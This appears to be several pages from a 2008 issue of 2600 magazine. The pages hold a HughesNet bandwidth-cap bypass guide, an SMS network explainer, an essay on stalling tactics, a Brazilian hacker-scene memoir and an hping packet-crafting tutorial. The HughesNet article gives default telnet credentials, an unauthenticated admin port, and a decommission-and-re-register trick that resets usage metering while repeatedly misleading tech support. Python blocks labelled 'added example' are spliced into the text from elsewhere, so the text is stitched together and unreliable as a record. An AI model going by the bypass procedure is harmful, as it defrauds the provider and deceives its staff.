1. http://www.wayport.net/
2. http://www.kaboodle.org/
3. http://tmac.technitium.com/tmac/

Thanks: Droid for telling me about this method and the author of the 2600 article about it.
Summer 2008 ------------------- Page 11

The HughesNet FAP
by ntbnnt
I use satellite Internet, which is great for web browsing, IRC, IM, e-mail, and the like. But it offers absolutely no convenience whatsoever for downloading music, listening to internet radio, or downloading my favorite Linux distro.

You see, HughesNet has a particularly restrictive Fair Access Policy (FAP). Now, I understand perfectly why a FAP is needed; however, it seriously limits many of the more obvious and useful applications of high-bandwidth Internet.

Having the hacker's perspective, I questioned if it were possible to reset my Internet usage statistics, so that I'd be able to take the 2.5 hours of non-stop HTTP communication that it takes to download an .iso of Debian without having to wait 24 hours after each hundred megabytes.

The equipment for a HughesNet connection is a satellite dish, its radio, and a receiver, or modem if you will. The modem is a basic VxWorks-based router with only one port and the equipment and software to interpret the satellite signal. You can telnet into this router by connecting to 192.168.0.1:23 and entering the username brighton and the password swordfish. Anyone with experience hacking VxWorks equipment should find a new toy instantly with that information. But, onward to the FAP issue.

There is a separate telnet daemon running on the HughesNet modem. It is listening for the free-minded to call upon its power at 192.168.0.1:1953, and Hughes made it easy for us, since we can access this menu without any kind of login. Basically, this is the CLI of what you get by visiting http://192.168.0.1, but it provides some much more useful functions. Entering ? into the command prompt will yield all the info we will need.

The HughesNet FAP is enforced by tracking the bandwidth used by each Site ID. If you've never done so before, go to System Info to see this. Basically, it serves as authentication that your modem is commissioned for service. If you have no Site ID, access to the HughesNet network will not be granted. Now, basically the goal is to reset all of the information stored about you at the HughesNet NOC, so your FAP status is reset back to nil. That will allow you to finish the download of Debian, RedHat, or whatever you prefer.

So, we will need the help of tech support. This is fine, because tech support is your friend. Reconnect to your router and enter the command rd. This is going to force your modem into a state of being decommissioned, which will require it to be recommissioned with the help of tech support. Go ahead and call 1-866-347-3292. Give them all the info they need; be honest.

The agent will not check your FAP status; it's simply not in the script. He will tell you to go to http://192.168.0.1/fs/registration/setup.html and click "Re-Register." Continue through the prompts until the modem reboots. After it does so, let it sit, watch the status at http://192.168.0.1, and let it update. When it's done updating, go ahead and check the FAP status. It should now say "NO." That means sweet, unmetered freedom. Smile and watch as your connection goes from 2.2 kb/s to 200.2 kb/s, and smile bigger with that nice fat download sitting in your download folder. Redo this as needed, but remember to call tech support every few times that you need to do it; that way Hughes will see that there are issues with your service and that you aren't decommissioning your modem for fun.
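The design flaw the procedure above depends on is that the usage counter follows the Site ID, and re-registration hands out a fresh one. As an added example (not HughesNet's code; the account and site identifiers and the 100 MB per 24 hours threshold are constructed), here is a rolling-window meter that keys usage to the subscriber account, so decommissioning and re-registering a modem changes nothing about its quota:

```python
# Added example: a Fair Access Policy meter that keys usage to the subscriber
# account rather than to the modem's Site ID. Not HughesNet's code; the
# identifiers and the limit are constructed for illustration.
from collections import defaultdict, deque

WINDOW_SECONDS = 24 * 3600          # rolling 24-hour window
LIMIT_BYTES = 100 * 1024 * 1024     # "a hundred megabytes" per window (constructed)

class FairAccessMeter:
    def __init__(self, limit_bytes=LIMIT_BYTES, window=WINDOW_SECONDS):
        self.limit = limit_bytes
        self.window = window
        self._site_to_account = {}          # commissioning state: site_id -> account
        self._events = defaultdict(deque)   # account -> deque of (timestamp, bytes)
        self._totals = defaultdict(int)     # account -> bytes used inside the window

    def commission(self, site_id, account):
        """Bind a (possibly brand-new) Site ID to an existing account."""
        self._site_to_account[site_id] = account

    def decommission(self, site_id):
        """Drop the Site ID only; the account's usage history is untouched."""
        self._site_to_account.pop(site_id, None)

    def _account(self, site_id):
        try:
            return self._site_to_account[site_id]
        except KeyError:
            raise PermissionError(f"site {site_id} is not commissioned") from None

    def _expire(self, account, now):
        # Slide the window: forget traffic older than the window length.
        events = self._events[account]
        while events and now - events[0][0] >= self.window:
            _, nbytes = events.popleft()
            self._totals[account] -= nbytes

    def record(self, site_id, now, nbytes):
        """Account for nbytes transferred at time now; returns window usage."""
        account = self._account(site_id)
        self._expire(account, now)
        self._events[account].append((now, nbytes))
        self._totals[account] += nbytes
        return self._totals[account]

    def throttled(self, site_id, now):
        """True when the account behind this Site ID is over its window limit."""
        account = self._account(site_id)
        self._expire(account, now)
        return self._totals[account] > self.limit

def reregistration_demo():
    """Usage recorded under SITE-A still throttles the same account after it
    is decommissioned and re-registered as SITE-B; only elapsed time clears it."""
    meter = FairAccessMeter()
    meter.commission("SITE-A", "acct-0001")
    meter.record("SITE-A", now=0, nbytes=120 * 1024 * 1024)
    before = meter.throttled("SITE-A", now=60)
    meter.decommission("SITE-A")              # the modem is taken out of service
    meter.commission("SITE-B", "acct-0001")   # re-registration issues a new Site ID
    after = meter.throttled("SITE-B", now=120)
    later = meter.throttled("SITE-B", now=WINDOW_SECONDS + 1)
    return before, after, later

if __name__ == "__main__":
    print(reregistration_demo())   # (True, True, False)
```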
Shouts to h3xis, who taught me about
firmware, showed me how to hack Tomato,
and introduced me to 2600.
Hello, and greetings from the Central Office! After an unusually cold and rainy winter here in the Pacific Northwest, summer is in full swing. With so little good weather in this part of the world, people head outdoors and make the most of it - even with gasoline hovering near $5 per gallon.

For many young people, this means it's time for noisy outdoor concerts, which I'm told are even louder than our diesel backup generator here at the Central Office. At a huge music festival with sound systems approaching the decibel level of a 737 taking off, how do you find your friends? Increasingly, text messages are the solution.

You may not think about it much when you're sending "HEY CRACK DAWG WHERE U @" to your friend, but sending and receiving small text messages is incredibly complex - in fact, much more complicated than email. Making matters worse, there are multiple versions of SMS, and multiple technologies involved in mobile phone systems (for example, CDMA IS-95, CDMA2000, GSM CSD, and GSM GPRS). For this article, I'll focus on GSM networks, which are operated by AT&T and T-Mobile (along with some smaller regional carriers such as Edge Wireless) in the U.S.

Text messages are governed by the Short Message Service (SMS) standard. This is currently defined as part of the European Telecommunications Standards Institute (ETSI) GSM 03.38 standard. It incorporates, by reference, the MAP part of the Signaling System 7 (SS7) protocol. The specification allows for 140-byte messages. In North America, this translates to 160 characters because the character set used is limited to 7-bit ASCII characters. In Unicode alphabets (such as Arabic, Chinese, or Cyrillic), where characters are two bytes apiece, SMS messages can only be 70 characters in length. Whichever alphabet you use, larger messages are generally split apart to be delivered (and billed) as multiple text messages. However, because additional metadata is required to accomplish this, the size of each message is reduced by six bytes (seven ASCII characters).
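The 140-byte arithmetic above (160 7-bit characters, 70 two-byte characters, and six bytes less per concatenated part) is easy to get wrong in anything that segments or bills SMS traffic. The Python below is an added example, not code from the column, that packs text into GSM 03.38 septets and computes the part count; the alphabet table and extension characters come from the standard as I know it, not from the page.

```python
# Added example: SMS length arithmetic from GSM 03.38, not code from the column.
# Single part: 140 bytes = 160 GSM 7-bit characters or 70 UCS-2 characters.
# Concatenated parts carry a 6-byte user-data header, leaving 134 bytes =
# 153 septets (7-bit) or 67 UCS-2 characters per part.

# GSM 03.38 default alphabet, indexed by 7-bit code (0x00..0x7F); 0x1B is escape.
GSM7_BASIC = (
    "@£$¥èéùìòÇ\nØø\rÅå"
    "Δ_ΦΓΛΩΠΨΣΘΞ\x1bÆæßÉ"
    " !\"#¤%&'()*+,-./"
    "0123456789:;<=>?"
    "¡ABCDEFGHIJKLMNO"
    "PQRSTUVWXYZÄÖÑÜ§"
    "¿abcdefghijklmno"
    "pqrstuvwxyzäöñüà"
)
# Extension table: each of these costs two septets (escape + code).
GSM7_EXT = {"\f": 0x0A, "^": 0x14, "{": 0x28, "}": 0x29, "\\": 0x2F,
            "[": 0x3C, "~": 0x3D, "]": 0x3E, "|": 0x40, "€": 0x65}

SINGLE_7BIT, MULTI_7BIT = 160, 153   # septets per part
SINGLE_UCS2, MULTI_UCS2 = 70, 67     # 16-bit code units per part

def gsm7_septets(text):
    """Return the septet codes for text, or None if a character is not in
    the GSM 7-bit alphabet (the message then needs UCS-2)."""
    codes = []
    for ch in text:
        if ch in GSM7_EXT:
            codes.extend((0x1B, GSM7_EXT[ch]))
            continue
        idx = GSM7_BASIC.find(ch)
        if idx < 0 or idx == 0x1B:          # unknown character, or a raw escape
            return None
        codes.append(idx)
    return codes

def pack_septets(codes):
    """Pack 7-bit codes into octets, least significant bits first, as the
    air interface does; 160 septets fit exactly into 140 bytes."""
    out, acc, nbits = bytearray(), 0, 0
    for code in codes:
        acc |= (code & 0x7F) << nbits
        nbits += 7
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    if nbits:
        out.append(acc & 0xFF)
    return bytes(out)

def sms_parts(text):
    """Return (encoding, number_of_parts, units_per_part) for text."""
    codes = gsm7_septets(text)
    if codes is not None:
        enc, units = "GSM 7-bit", len(codes)
        single, multi = SINGLE_7BIT, MULTI_7BIT
    else:
        # UCS-2 code units; characters outside the BMP take two units.
        enc, units = "UCS-2", len(text.encode("utf-16-be")) // 2
        single, multi = SINGLE_UCS2, MULTI_UCS2
    if units <= single:
        return enc, 1, single
    return enc, -(-units // multi), multi   # ceiling division

if __name__ == "__main__":
    for msg in ("hello", "a" * 161, "Price: 5€", "Привет, как дела?"):
        print(repr(msg[:20]), sms_parts(msg))
```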
To understand how an SMS message is delivered, it's important to first understand a little about how GSM switching works. So, here's a crash course.

HLR

When you sign up for service, your phone number, the IMSI from your SIM card, and information about the capabilities of your account are input into the Home Location Register (HLR). This is a database operated by your wireless carrier, and it largely controls what your handset is both allowed and configured to do on the network (e.g. place and receive calls, send and receive text messages, forward calls to voicemail, use data services, and so forth). The HLR also keeps (approximate) track of your location on the network, in order to deliver calls and messages appropriately. In general, each wireless carrier operates one HLR topology, and large carriers split up subscribers between HLR nodes. The HLR is the nerve center of a wireless carrier, and if it fails, a very bad day is guaranteed for the person who administers it. At a minimum, nobody will be able to receive incoming phone calls, text messages will be delayed, calls will not forward to voicemail, and self-important people in SUVs everywhere will be unable to use their BlackBerrys while running over old ladies in crosswalks. So, as you might imagine, an HLR outage means the carrier may lose thousands of dollars per minute. Fortunately, redundancy and failover capability are fairly sophisticated. For example, Nortel's NSS19 platform allows for both local and geographical redundancy. HLR databases themselves are also designed with a high degree of redundancy and fault tolerance, allowing rapid recovery in the event of failure.
MSC

An MSC is a Mobile Switching Center. In effect, this is a Central Office for mobile phones. However, unlike traditional wireline Central Offices, which generally cover only one city (or in large cities, as little as one neighborhood), MSCs generally cover an entire region. These incorporate all of the functionality you would expect from a modern Central Office, along with a lot of whiz-bang features specific to mobile phone applications (such as the VLR described below).

MSCs can be either local or gateway MSCs. A gateway MSC is analogous to a tandem switch, and can communicate fully with other wireless and wireline networks. A local MSC is analogous to a local switch, although these switches can often route directly to the PSTN (and increasingly, VoIP networks) for voice calls.
VLR

Your mobile phone will generally be registered in the Visitor Location Register (VLR) of the Mobile Switching Center (MSC) serving the area in which it is located (although the HLR does not necessarily have to be decoupled, so in smaller GSM systems the VLR may be the same as the HLR). The VLR retrieves a local copy of your subscriber profile from the HLR, so most routine queries can be processed against the VLR rather than the HLR. This minimizes load on slow and expensive inter-carrier SS7 (and sometimes even X.25) links and the HLR servers. These systems are also designed with a high degree of fault tolerance, because it's also bad if they fail. However, the failure of a VLR will cause only a localized outage. Failed calls will generally be forwarded to voicemail in the interim, and SMS messages will be held for delivery until the VLR is again operational.

MXE/MC

The MXE (also referred to as MC) handles messaging. On GSM systems, this includes voicemail, SMS, and fax features (yes, the GSM standard includes sending and receiving faxes for some reason).

SMSC

Hey, we finally got to the piece that really matters. The SMSC is the component of the MXE which handles SMS origination and termination. SMS messages sent or received generally pass from your handset to the MSC to the MXE to the SMSC, and then either in the reverse direction (for on-network SMS) or to the gateway MSC for inter-carrier delivery.

Message flow

I'm a visual person, so here's a visual depiction of how an SMS is sent. Read it from left to right:

Figure 1: Mobile SMS Origination
Diagram drawn by Carre

Note that the SMS protocol accounts for the unreliability of wireless networks by using an acknowledgment sequence.

Next, here's a visual depiction of how your phone receives SMS messages from the network. Read it from right to left:

Figure 2: Mobile SMS Termination
Diagram drawn by Carre

Note that the acknowledgment sequence is also end-to-end, as in Figure 1.

Billing

While the GSM standard defines how the SMS protocol works and the data structures associated with it, billing is left up to the carriers. This is a contentious issue, particularly overseas where carriers do not charge for receiving SMS messages. Unlike email, SMS is billed per message, and carriers will generally not deliver messages unless they have a billing arrangement with the originating carrier. This has given rise to inter-carrier SMS providers, such as VeriSign, who negotiate wholesale billing arrangements on behalf of carriers. Generally, in the absence of a billing arrangement, carriers will refuse delivery of SMS messages. This is a particularly glaring issue when using SMS short codes. For example, the popular 8762 (UPOC) short code is not available to Sprint subscribers, because Sprint lacks a billing arrangement with Dada (the owner of Upoc).

Well, it's the end of my shift here in the Central Office, so enjoy the rest of your summer and please wear ear plugs if you dance near the big speakers. Instead, save your hearing for The Last HOPE in New York, where I'll be speaking this year!
by Barrett Brown

"holding" (hōl'ding)
1. in certain sports, the illegal use of the hands and arms to hinder the movements of an opponent

"action" (ak'shən)
1. the effect produced by something.
2. a) a military encounter
   b) military combat in general

Everyone is familiar with what holding actions are; we experience them every day of our lives. What many people may not know is that holding actions can be very carefully planned using statistics, making them a powerful tool of manipulation.

First, let's acquaint ourselves more specifically with what a holding action is.
Scenario One: Let's say, for example, that you are trying to get a refund for some small item you bought but which you received in the mail broken. The item cost $30.00, but you paid for it, and you want to get what you paid for. You call the company and are greeted by a phone tree. The phone tree is the first step in the company's holding action against you. You spend forty minutes navigating around the tree, and you finally reach a customer service representative, who informs you that in order to get a refund or exchange, you need to have the original receipt, fill out some forms they send you in the mail, and send your item back to them. You wait for your forms in the mail, but three weeks later they haven't come. So you spend another forty minutes on the phone tree to reach another representative, who apologizes and says the forms will be sent to you. This step can be repeated as many times as necessary until you get so tired of wasting your time that you just give up on the refund entirely. This is an example of a successful holding action by the company against you. Through the use of phone trees and red tape, the company avoided spending money on you. In fact, because time is equal to money in most people's lives, they made you spend even more money.

Scenario Two: Now let's say, completely hypothetically, that you are an American president. Oh, I don't know, how about Ronald Reagan. And you are two weeks away from your re-election day. Something bad comes out in the news (for example, Reagan molests a Girl Scout) that threatens your numbers in the polls, and you need to distract the public just long enough to ensure your re-election. There happen to be US prisoners of war in Iran, and you make a secret deal with the Iranians that if they release the hostages the day after re-election, you will give them some guns or drugs or something. Then you go on TV and promise that if you get elected, the hostages will be released. This is another form of holding action which uses the media. The president does not need to prove the Girl Scout wrong or clear his own name. He just needs to hold the people's attention for two weeks, until he gets re-elected. Distraction holding action.

Scenario Three: You are a homeless heroin addict. You are sent to jail for a crime you did not commit. While in the city jail, awaiting trial, you are in excruciating agony because your body is suffering from opiate withdrawal. Every day that you are incarcerated is a day in agony. Your public defender tells you that you can plead guilty and get out in two days, or you can fight to prove your innocence, which will take months. You are caught in a holding action (as well as a holding cell), and most people in these conditions fold under the pressure.
Holding actions are used on us every day, in ever-increasing numbers. Major companies actually have statistics which tell them exactly what percentage of customers will hang up or reach the wrong person when calling an automated phone tree, and they count on those numbers. They save money with every customer that does not reach them, or so their logic goes. The main commodity which a holding action manipulates is time. Whether we realize it or not, time is money, and since corporations, private interest groups, and wealthy individuals have much more money and time than the average person, these large entities will always win any given holding action.

Let's examine scenario two again. A customer in this scenario who is somewhat poor may not have forty minutes to spend on a phone tree. Either they are busy working for minimum wage, or they are spending their free time doing laundry and shopping. A poor person often does not have the time to spend on red tape and will give up early, thus saving the manipulative entity in question from replacing their defective product. A wealthy individual in scenario two would have more time to wait on hold, or even a secretary to make the call instead, thus increasing the chances that they will end up getting what they paid for.

Now that we understand a little about how holding actions are used against us, let's think about how they can be used to our advantage. The basic idea is to stall for as long as possible until your enemies either give up, forget or lose the paperwork regarding you, or decide that it is costing them too much money, or until you are in a better position to resolve the matter.
The poor soul in scenario three could have fought his own holding action by insisting on a trial, but not a speedy one. The judicial system in the U.S. functions primarily on "plea-bargains," which are deals made with the District Attorney. Most courts have no interest in trials because they cost too much money and time. So in the case of scenario three, assuming the charge was small and the person had no prior record, they could insist on a trial. It would take a few months, but chances are good that the charges would be dropped when the DA realized that their own holding action was not working. A friend of mine did exactly this, going to court every month for three years, stalling the case. Every month the DA would offer a new deal, and every month my friend would say, "I want a trial." Finally, after they had postponed the trial to the farthest possible legal time limit, the DA made one last offer, which was fair.

Have an ugly looking credit report? File a dispute on every single bad mark you have. Companies, especially creditors, are routinely bought by other companies, and many times paperwork or data is lost in the transition. When you dispute a claim on your credit report, the burden of proof is on the company. They only have a limited amount of time to prove that you owe them money, or they have to drop the claim from your report. Because these companies are so busy, it is very common for claims to be dropped simply because the creditor did not have the time to find your file and send it to the credit reporting agency. In addition, if your claim is small, it costs the company more money to prove that you owe them than it does to just drop the whole matter. This is using a holding action to your advantage.

Another example is lawsuits. Part of the reason why large companies routinely settle stupid lawsuits for large sums of money is that they are aware of how much more money, time, and publicity it would cost them to go to trial.

Time and information are the two most important commodities in our world today. The more information you have about your opponent and about how their time is allocated, the better your ability to contrive ways to distract your opponent from using time against you. The more control you have over an opponent's time, the less they have over yours. The ever-growing complexity in bureaucracies, aided by the growth of technology, ensures that manipulating people's time is a trend which will only continue to grow and be refined in the years to come. The more you are aware of these processes, the better-equipped you will be to use them to your advantage.
Thirteen Years of Starting a Hacker Scene
by Derneval Ribeiro Rodrigues da Cunha

For those of you who don't remember me, I'm the one who wrote "Hacking in Brazil" and "Starting a Hacker Scene." Maybe one or two of you have heard of Brazilians on the internet. Unfortunately, there are a great many of them calling themselves hackers and defacing websites. No, I'm not the one who bullshitted those guys into doing electronic vandalism. What I did was to start writing the first Brazilian hacker ezine in 1994. The internet wasn't available back then; people could only learn about it at universities and in a few other places. It just so happened that I did know about it. And there I learned about hacker ethics, viruses, phreaking, and all that stuff. I was involved in setting up an ecology Internet discussion among elementary schools. Then I heard about a "Hacker and Virus Congress" in Buenos Aires, Argentina. It ran for about four days, which I used to learn and talk with people from Hacktic and 2600 and with several Argentine people connected with computer security, among other things.

Few people in South America had Internet accounts. Most things happened in BBSes, on Fidonet or the like. Computer viruses were the main subject when people talked about computer insecurity. But they generated a lot of press coverage in those days. It was, though, very difficult to get any information about anything like "dark subjects." Myself, I had to hack my way into an academic internet account. I did this legally, not by using somebody else's account. I'm not going to talk about bad connection lines; phone modems were everything but reliable. (I wrote about this in "Brazilian Phone System.") I'm talking about people using 600 bps, maybe 1200 bps, sometimes 2400 bps modems. Instead of downloading big files from a BBS, you'd rather choose the files first, then go there yourself with floppies to pick them up. I myself would use the internet only from university computers; I never had to use dial-ups to access anything. Computer students themselves didn't know much about it except what they learned from movies like Wargames. That was in the second biggest university in South America. Those were the "golden years."

So, what was my goal? Just to get people together, so they could exchange information. I had to have people to talk about. They had to know about hacking. I had to spread the word for that to happen, so that people all around Brazil (those that deserved to be called "hackers") would know what it was all about and hold meetings. Later on, the thing would be to prepare for a Brazilian hacker conference. So I started the easiest way: by starting an electronic publication. This was when everybody was just starting to know about the internet, just before Brazilians could get commercial internet access. My ezine was the first on the scene.

My boss didn't fire me when he heard about my plans; he understood things. But everywhere I heard of, a bunch of people joined and started things. I, though, had to start on my own. I borrowed articles from the public domain here and there, asked for permission to publish this or that, sometimes rewrote things, and did some writing on my own. Some of the stuff was so good that it's still published today without my permission or anything else. And, even today, I haven't completely decided if I should sue the guys that did it. There were people who bought books because my article was in them.

Things worked just fine for the publication. My choice of writing in pure ASCII code helped it to be uploaded to and downloaded from in BBSes all around the country and abroad, in Portuguese-speaking places like Portugal and Mozambique. Barata Eletrica ("Electric Cockroach") spread everywhere like a disease. It appeared in places like Usenet, like the 2600 list and soc.culture.brazil. Myself, I made it available for download from the EFF and etext.org. Check Google for the current web address or visit barataeletrica.cjb.net. The people from the computer science faculty of a federal university, UFSC, kept a mirror on their website for about a decade, and I've never set foot there; thanks to them! At my own University of Sao Paulo, they would not hear a thing about it; in fact, they hated me. I almost lost my access there but got it back months later.

Soon people started to write other, more aggressive publications, like the ezine Axur 05, Nethack, and a few others, mostly on BBSes. That was at the time of Mitnick's arrest. If someone wanted to be known as a hacker, he and his friends would write an ezine. Lots of good information started to be spread around, like philes about how to get free phone calls in the Brazilian phone system. (They eventually fixed that.)

The ezine grew quite complex. For one thing, I started to enjoy writing. It became more than a hobby. It always took more time to write things. And if I could not enjoy reading it myself again, I would rewrite the article. The ezine, originally meant to be something simple, grew complex, with sections like a FAQ, about, history, better articles, and a news section that was so troublesome to make that I turned it into a blog (barataeletrica.blogspot.com). If I wrote something, there would be a reference or a link saying where I took it from.

People started offering services like how to improve my HTML (it sucks) and easy access of the web site, for free. I declined. I started it all alone; nobody wanted to spare time to help me. Once I was famous, who cares? Besides, a better ezine would involve getting more complex. My focus wasn't in delivering better things to the growing number of people who were getting Internet access. The way it was, I was getting three or four letters a day asking, "Can you teach me hacking?"

I could have gone corporate. But I would have had to charge for that. In fact, when I started the ezine, the freeware concept was not understood. For me, it meant that I would not have to worry about paying wages, taxes, revenue, income, consumer rights, and so on. I would have had to register the ezine; then I would have been a target. If anybody sued me and I lost, that would have been it. And the kind of articles I published were often in gray areas of the law. If you're a hired hand, you need to work eight hours a day, but if you're a boss, you work twice that much.

My opinion was quite respected. Among other things, I can say I started the talk about Linux in Brazil. Phiber Optik came here; I told everybody to ask him to compare Windows security versus FreeBSD. Newswriters did not know anything about it. I was also there to give support when an activist from Amnesty International, Fernanda Serpa, started the "Free Kevin Mitnick" movement in Brazil. Maybe I'll write about it someday. When there was talk about bringing Markoff and Shimomura to a US$400 per ticket conference to talk about "the pirate and the samurai," I wrote an article in the ezine. Later on, nobody talked about bringing those guys here to Brazil for a conference anymore.

My task was completed. The "hacker scene" had happened. It was no dream anymore. There were some very strong meetings, 2600 meetings, and people were talking about it everywhere. And people knew the difference between good hackers and lamers. But then the paper press started to run articles teaching bad things for fun. An issue of the now-defunct Brazilian edition of Internet World surprised me in that way. Mostly, it had articles telling everything about hackers' bad deeds. Put together, the articles gave knowledge about how to nuke other PCs. My good luck was I declined an interview. Maybe I would have been considered part of the group. Other magazines also did similar articles. Some guys started to write books using material from the ezines. And these books were a hit, even if things in there didn't work anymore. I can trace today's Brazilian electronic vandalism back to those mags and books.

My "hacker" congress never came off. The internet was spreading fast, but I didn't have a computer science degree. My knowledge was mostly Unix-based, and it was quickly devalued. Like most dinosaurs, I didn't believe in a commercial Internet. Maybe it was a bad thing that I wasn't money driven. Instead of setting up an enterprise, I enrolled in a post-graduate course. Don't think that the people who started Yahoo! were more gifted than me. I took my motto "I login therefore I am" (check Google; I said it first) and began to gather all my experiences with the hacker scene into an academic work.

People kept pressing me to write a book about all my exploits rather than a thesis. And the fact is that I collected enough data to write a lot about those days. I could fill two or three books just with information from the ezine. Some day, I'll do it. But for the moment, writing a book in order to just earn money would be selling out. And I could already have done that even with a "I am a friend of Barata Eletrica's author" card. One ex-friend of mine got his US$20 debt pardoned just because he introduced me to his creditor, just like that. If I wanted to write about "how to hack things," I could have done it much earlier. I maybe even could have earned cash doing lectures somewhere, and got a Masters degree. I could also simply have stopped hacking and got a good job in computer security. But, one can't write a thesis and do computer security at the same time. And I'm still thinking about it, but it has to be outside Brazil.

In fact, I soon found out that some people were sticking with me because of the "dark side." Sometimes I even lost "friends" because they gave up on me writing about them. I always warned about my focus on hacker ethics and the pursuit of knowledge. I changed my writing in order to avoid copycats. The ezine is still about hacking, but it now takes a much broader view. How would you teach hacking without using computers? Hacking computers is not the only way to learn about hacking. Some people
promised me that they would keep on reading. And I kept writing the ezine and a blog because it's such a waste to stop.

It sometimes pays off to do a blog. Once I posted that I needed a few memory chips for my old-fashioned computer. I live in Sao Paulo. One guy from Rio de Janeiro read it, asked for my postal address and sent the chips, along with other things: about 16 kg of hardware, a complete CPU he'd made up of old pieces he gathered from friends. He threw a party, people brought things, they set up a Pentium 233 with a 30 gig HD, and they sent it and some other things to me, by FedEx. I couldn't believe it and sent him some t-shirts by way of thanks. I still used that computer until last Christmas, when a big fan and friend of mine sent me a Pentium 4 with a 150 gig HD and a few science fiction magazines. Maybe that guy is one of the thirty-five that prevent God from destroying the Earth. I don't know.

The problem today with writing a hacker ezine and blog is that today, everybody's got much more access than at the time I started. And there are many people claiming hacker knowledge. Even YouTube has a video or two about computer insecurities. One doesn't have to go underground to learn about "dark subjects." One has to have the conscience, which is the main subject about which I used to write, right from the beginning. If you write about how to do it, that will get old soon. When you write about how to think about it, it will stick. People still can get old issues of my ezine and find good thinking material. That might save their butts one day.

Unfortunately, I could not write a thesis about what I did. The Portuguese language is tough to read. My not writing a book is also something to blame myself for. How could I write a book about "starting a hacker scene" and then get a "normal" job anywhere but in computer security? There was a "hacker" conference in Sao Paulo, where I live. I could not go. In the USA or Europe, it would be no problem. But not here. There were lots of TV cameras everywhere. No way. At that time, I was working right next to an office where people were trying to sue YouTube. I even knew which books of legislation were being consulted. These people next door did not know about my past, and why should they? Yet, a few weeks ago, I attended another security conference, YSTS. But there were fewer cameras and none from TV.

Also, people always charge you more if they know you're famous. For a time, I would even check famous people for stories about how to deal with fame. It's no easy task, but I believe that sometime in the future, everybody will have to learn about it, how to relate to the press and how to use fame for a purpose. People on the internet don't know this, and they lose great opportunities.

It's like that: for one thing or another, you get famous. Before you know it, it's gone. People have to consider that getting famous is no fairy tale. In order to make some good use of it, one has to know about it. If you publish something today in YouTube or in a blog, it will be remembered somewhere, sometime. You've changed, grown older, but your past is still there. Just like it was. I was very fortunate the way I wrote things. I never used an alias to write, and I have no regrets about it.

When you get famous, some people get to know you because they are getting famous at the same time, but in different places, with other occupations. Mauro Marcelo, who got appointed the chief of the Brazilian Intelligence Agency (ABIN), did know me. I could have interviewed him there and then, but that's another story, and a sort of funny one. Eventually, he was kicked off the job because of the intrigue there, which makes me think he's not such a bad guy; those guys from ABIN aren't popular. When he was there, he bothered to answer an email of mine. Who knows? Maybe someday I'll contact him again. He might have some good stories to talk about. He was, after all, the first Brazilian "Cyber" cop.

He wouldn't catch me, for sure. I stopped all "hacking" when I began writing the ezine. Maybe not all of it, but why bother? That magic word "please" works wonders. You just have to know who to ask. If the guy doesn't know you, just play that song, "Let me please to introduce myself, I'm a man." You can't always get what you want, but sometimes you do. I would never know how to stash things inside University of Sao Paulo computers without a little help from my friends. I would always sing "Don't you forget about me" for myself, later. You can get high doing things like these. Believe me.

After thirteen years of Barata Eletrica, is anybody snoring out there? It's been a great experience, being famous for writing an ezine. I did it mostly because of the readers. What a feeling when you meet someone who got his life changed because of an article of yours! I never got laid because of it, but I did learn a lot about a lot of topics, from public relations to law and journalism. Maybe someday, I'll get a job out of it.

I think everybody should try it. Someone said that if you don't like the news, you should go out and make some of your own. Everybody can help change the world with simple gestures. Just interact with your community. My ezine started like that: a publication for a few people using an internet-connected computer lab nearby. Think about it.
Summer 2008 ------------------- Page 19
HPing (The Part I Forgot)
In my last article ("Essential Security Tools," 2600 Winter 2007-2008), I wrote about some security tools, told readers where to get them, and gave a basic introduction of what they do. Most astute readers may have noticed that the section on HPing was very brief. When I was drafting the article, I was moving subjects around, and so I misplaced the main body of my HPing section. When I received my copy of 2600 and noticed this, I firmly planted my face in the palm of my hand and let out a loud "D'oh!" To make up for it and to absolve myself of this error, I am dedicating this article entirely to the HPing utility.

HPing (http://www.hping.org) is a great tool to have. You can use it for very simple tests or you can set it up to do something more advanced, such as transfer files. Let's start off with the basic stuff.
HPing Basics

HPing, at its most basic, is a packet crafter. You can get a lot of use out of just this basic function. Let's examine using HPing to "ping" a TCP port:

    [root@doormouse ~]# hping2 localhost -S -p 22
    HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
    len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms

In this example, we've asked HPing to send the local host TCP/SYN packets (-S), with the destination TCP port set to 22, which is for ssh. The reply packets we get are the next part of the TCP three-way handshake, with the SYN/ACK flags set. This is indicated in HPing by the flags=SA field. This tells us that the TCP port is open and that we are allowed to access that TCP port. (A closed port answers with flags=RA, a RST/ACK; a port whose SYN is dropped by a firewall answers with nothing, and HPing only reports the packet loss in its statistics at the end.) This is useful in testing whether or not your firewall rules are set up properly. Let's say that you have a web server and that you want to ensure that people from the 10.20.30.0/24 network are allowed to access it. You can just HPing the server with the SYN flag set, from a host on that network, and see if you get a reply.

You can set all, some, or none of the TCP flags if you wish to check TCP stacks or your Intrusion Prevention System (IPS). For example, if you have an IPS set up and you want to test your filters against odd TCP flag settings, you can use HPing to do that:

    [root@doormouse ~]# hping2 localhost -FPU -p 999
    HPING localhost (lo 127.0.0.1): FPU set, 40 headers + 0 data bytes
    len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 flags=RA seq=0 win=0 rtt=0.1 ms

Here FIN, PUSH and URG are set together (the "Xmas" probe). Nothing is listening on port 999, so the stack answers with a RST/ACK; an open port on a stack that follows RFC 793 would silently ignore such a segment, which is why this probe can also tell open and closed ports apart when a plain SYN is filtered.

In addition to TCP packets, HPing can send UDP. The next example shows UDP packets sent to port 0, which is not listening, on a Check Point SofaWare box:

    [root@doormouse ~]# hping2 210.210.210.1 -2
    HPING 210.210.210.1 (eth0 210.210.210.1): udp mode set, 28 headers + 0 data bytes
    ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall

Even though nothing is listening on that port on that host, we still know that the IP address is alive. It should be noted that some firewall software and operating systems will just drop these packets without sending anything back.

You can even craft packets at the IP layer, though this can be a bit tricky, depending on the protocol that you are attempting to use. In the tcpdump output shown below, I used "hping2 localhost -0 -v -H 41" to send IP packets to IP protocol 41, which is IPv6-in-IPv4, without any payload:

    [root@doormouse ~]# tcpdump -n -vv -e -s 1514 -x -i lo proto 41
    tcpdump: listening on lo, link-type EN10MB
    [timestamp unreadable] 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 8251, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
